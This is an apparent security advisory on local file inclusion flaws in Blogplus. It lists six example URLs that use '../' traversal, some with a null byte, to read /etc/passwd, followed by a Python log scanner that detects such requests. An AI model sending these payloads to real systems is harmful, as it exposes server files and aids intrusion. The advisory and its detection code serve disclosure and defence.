Blogplus Multiple Local File Include Vulnerabilities

Attackers can exploit these issues via a browser.

The following example requests are available:

http://www.example.com/path/includes/block_center_down.php?row_mysql_blocks_center_down[file]=../../../../../../etc/passwd
http://www.example.com/path/includes/block_center_top.php?row_mysql_blocks_center_top[file]=../../../../../../etc/passwd
http://www.example.com/path/includes/block_left.php?row_mysql_blocks_left[file]=../../../../../../etc/passwd
http://www.example.com/path/includes/block_right.php?row_mysql_blocks_right[file]=../../../../../../etc/passwd
http://www.example.com/path/includes/window_down.php?row_mysql_bloginfo[theme]=../../../../../../etc/passwd%00
http://www.example.com/path/includes/window_top.php?row_mysql_bloginfo[theme]=../../../../../../etc/passwd%00
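
An added detection example, not part of the original advisory: the Python below flags access-log requests that match the shape of the URLs above (a script under `includes/` with a `row_mysql_*[file]` or `[theme]` parameter carrying `../` segments or a null byte). The combined log format, the function names, the constructed sample log lines and the repeated percent-decoding (which goes beyond the literal requests listed) are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Parameter shape from the example requests: row_mysql_<name>[file] / [theme]
PARAM_RE = re.compile(r"^row_mysql_\w+\[(?:file|theme)\]$")
# Request line inside a combined-format access log entry (assumed log format)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so multiply-encoded input is normalised."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def suspicious_value(value):
    """List the reasons a decoded parameter value looks like path manipulation."""
    reasons = []
    if re.search(r"(?:^|[\\/])\.\.(?:[\\/]|$)", value):
        reasons.append("traversal")
    if "\x00" in value:
        reasons.append("null-byte")
    return reasons

def scan_line(line):
    """Return (script, parameter, reasons) tuples for one access log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if "/includes/" not in url.path or not url.path.endswith(".php"):
        return []
    hits = []
    # parse_qsl decodes once; fully_decode strips any further encoding layers
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        name, reasons = fully_decode(name), suspicious_value(fully_decode(value))
        if PARAM_RE.match(name) and reasons:
            hits.append((url.path.rsplit("/", 1)[-1], name, reasons))
    return hits

# Constructed sample log lines (addresses from the documentation ranges)
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2010:10:00:00 +0000] "GET /path/includes/block_left.php?row_mysql_blocks_left[file]=../../../../../../etc/passwd HTTP/1.1" 200 1532',
    '203.0.113.5 - - [01/Jan/2010:10:00:02 +0000] "GET /path/includes/window_top.php?row_mysql_bloginfo%5Btheme%5D=../../../../../../etc/passwd%00 HTTP/1.1" 200 1532',
    '198.51.100.7 - - [01/Jan/2010:10:00:05 +0000] "GET /path/index.php?page=2 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    print([scan_line(line) for line in SAMPLE_LOG])
```
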


 

Copyright 2010, SecurityFocus